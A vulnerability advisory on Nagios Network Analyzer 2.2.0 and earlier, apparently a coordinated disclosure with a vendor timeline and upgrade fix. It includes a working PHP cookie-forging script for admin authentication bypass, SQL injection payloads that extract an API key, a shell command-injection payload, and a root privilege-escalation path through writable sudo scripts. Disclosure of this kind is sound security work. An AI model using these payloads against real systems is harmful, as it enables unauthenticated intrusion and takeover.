扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 |
(, ) (, . '.' ) ('.', ). , ('. ( ) ( (_,) .'), ) _ _, /_____// _\________ _____ \____\==/ /_\\ _/ ___\/_ \ / \ / \/ |\\\__(<_> )Y Y\ /______/\___|__/ \___>____/|__|_|/ \/ \/.-.\/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Nagios Network Analyzer Multiple Vulnerabilities Affected versions: Nagios Network Analyzer <= 2.2.0 PDF: http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf +-----------+ |Description| +-----------+ The Nagios Network Analyzer application is affected by multiple security vulnerabilities, including authentication bypass, SQL injection, arbitrary code execution via command injection and privilege escalation. These vulnerabilities can be chained together to obtain unauthenticated remote code execution in the context of the root user. +------------+ |Exploitation| +------------+ ==Authentication Bypass== Authentication for the Nagios Network Analyzer web management interface can be bypassed due to an insecure implementation of the function validating session cookies within the ‘Session.php’ file. As shown below, the application uses a base64 encoded serialized PHP string along with a SHA1 HMAC checksum as the cookie to authenticate and manage user sessions. A sample cookie format is shown below: a:15:{s:10:"session_id";s:32:"325672f137d4e3747a0f9e61a4c867b2";s:10:"ip_address";s:15:"192.168.xxx.xxx"; s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0";s:13:"last_activity"; i:1463165417;s:9:"user_data";s:0:"";s:8:"identity";s:11:"nagiosadmin";s:8:"username";s:11:"nagiosadmin";s:5:"email"; s:30:"xxxxxx@security-assessment.com";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"1463163525";s:9:"apiaccess"; s:1:"1";s:6:"apikey";s:40:"6ba11d3f6e84011b3332d7427d0655de64f11d5e";s:8:"language";s:7:"default";s:10:"apisession"; b:1;s:7:"view_id";i:0;}<SHA1_HMAC_CHECKSUM> The application relies on the validation against the SHA1 HMAC to recognize and destroy invalid session cookies when the checksum value does not match. However the encryption key used to generate the HMAC checksum is statically set to the SHA1 hash value of the $_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value. This information can be controlled by the attacker and as such should not be considered a secure randomly generated value for the secret encryption key. Since no further verification is performed for other non-predictable fields (e.g. session_id, apikey, email, username etc.) and only a valid user agent string matching the correct HTTP header value is required, an attacker can forge arbitrary session cookies and bypass authentication. The script on the following page generates session cookies which are accepted and validated successfully by the application. A ‘user_id’ value of 1 can be used to initiate a session in the context of the admin user. [POC - nagiosna_forge_cookie.php] <?php // Usage: php nagiosna_forge_cookie.php [TARGET_IP_ADDRESS/DOMAIN NAME] $host = $argv[1]; $session = 'a:14:{s:10:"session_id";s:32:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:10:"ip_address"; s:15:"123.123.123.123";s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0";s:13:"last_activity";i:1463229493;s:9:"user_data";s:0:"";s:8:"identity";s:4:"XXXX";s:8:"username"; s:4:"XXXX";s:5:"email";s:16:"test@example.com";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"XXXXXXXXXX"; s:9:"apiaccess";s:1:"1";s:6:"apikey";s:40:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:8:"language";s:7:"default"; s:10:"apisession";b:1;}'; $encryption_key = sha1($host); $hmac_check = hash_hmac('sha1', $session, $encryption_key); $cookie = $session . $hmac_check; echo urlencode($cookie); ?> This vulnerability is present across multiple Nagios products. ==SQL Injection== Multiple SQL injection vulnerabilities exist in the application web management interface. An attacker can exploit this vulnerabilities to retrieve sensitive data from the application MySQL database. URL => /nagiosna/index.php/api/checks/read?q%5Blastcode%5D=0&o%5Bcol%5D=<PAYLOAD>&o%5Bsort%5D=ASC Method => GET Parameter => o[col] POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW) URL => /nagiosna/index.php/api/sources/read?o%5Bcol%5D=<PAYLOAD>&o%5Bsort%5D=ASC Method => GET Parameter => o[col] POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW) URL => /nagiosna/index.php/admin/globals Method => POST Parameter => timezone POC Payload => US/Eastern%' AND (SELECT 4646 FROM(SELECT COUNT(*),CONCAT(0x232323,(SELECT MID((IFNULL(CAST(apikey AS CHAR),0x20)),1,54) FROM nagiosna_users WHERE id=1 LIMIT 0,1),0x232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='' ==Command Injection== A command injection vulnerability exists in the function generating PDF reports for download. Base64 encoded user-supplied input is passed as an argument to system shell calls without being escaped. An attacker can inject arbitrary shell commands and obtain remote code execution in the context of the apache user. URL => /nagiosna/index.php/download/report/sourcegroup/<ID>/<BASE64 ENCODED PAYLOAD> Method => GET POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo " URL => /nagiosna/index.php/download/report/source/<ID>/<BASE64 ENCODED PAYLOAD> Method => GET POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo " Arbitrary code execution in the context of the ‘nna’ user can also be obtained by abusing the intended functionality to define custom alert commands. As shown in the next section, this exposes the application to additional privilege escalation attack vectors. ==Privilege Escalation== The default application sudoers configuration allows the ‘apache’ and ‘nna’ users to run multiple Bash and Python scripts as root without being prompted for a password. The 'apache' user is in the 'nnacmd' group, which has insecure write permissions to multiple script files. An attacker can overwrite their contents with a malicious payload (i.e. spawn a shell) and escalate privileges to root. The script files with insecure permissions are listed below: PATH => /usr/local/nagiosna/bin/rc.py PERMISSIONS => rwxrwxr-t nna nnacmd PATH => /usr/local/nagiosna/scripts/change_timezone.sh PERMISSIONS => rwsrwsr-t nna nnacmd PATH => /usr/local/nagiosna/scripts/upgrade_to_latest.sh PERMISSIONS => rwsrwsr-t nna nnacmd +----------+ | Solution | +----------+ Upgrade to Nagios Network Analyzer 2.2.2. +------------+ |Timeline| +------------+ 2/06/2016 – Initial disclosure to vendor 3/06/2016 – Vendor acknowledges receipt of advisory 3/06/2016 – Vendor releases new software build (2.2.1) 8/07/2016 – Inform vendor about insecure fix (generation of encryption key based on epoch) 9/07/2016 – Vendor confirms issue and replies with new fix 01/08/2016 – Vendor releases patched software version 11/08/2016 – Public disclosure +------------+ | Additional | +------------+ Further information is available in the accompanying PDF. http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf |
体验盒子
